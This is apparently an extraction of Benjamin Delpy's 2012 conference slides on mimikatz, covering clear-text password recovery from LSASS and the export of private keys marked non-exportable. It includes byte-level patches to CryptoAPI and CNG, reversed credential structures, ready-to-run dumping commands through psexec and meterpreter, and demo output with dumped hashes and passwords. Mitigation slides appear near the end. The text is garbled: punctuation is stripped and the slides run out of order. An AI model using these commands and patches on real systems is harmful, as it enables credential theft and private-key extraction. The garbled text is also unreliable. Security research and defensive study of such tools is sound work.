07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
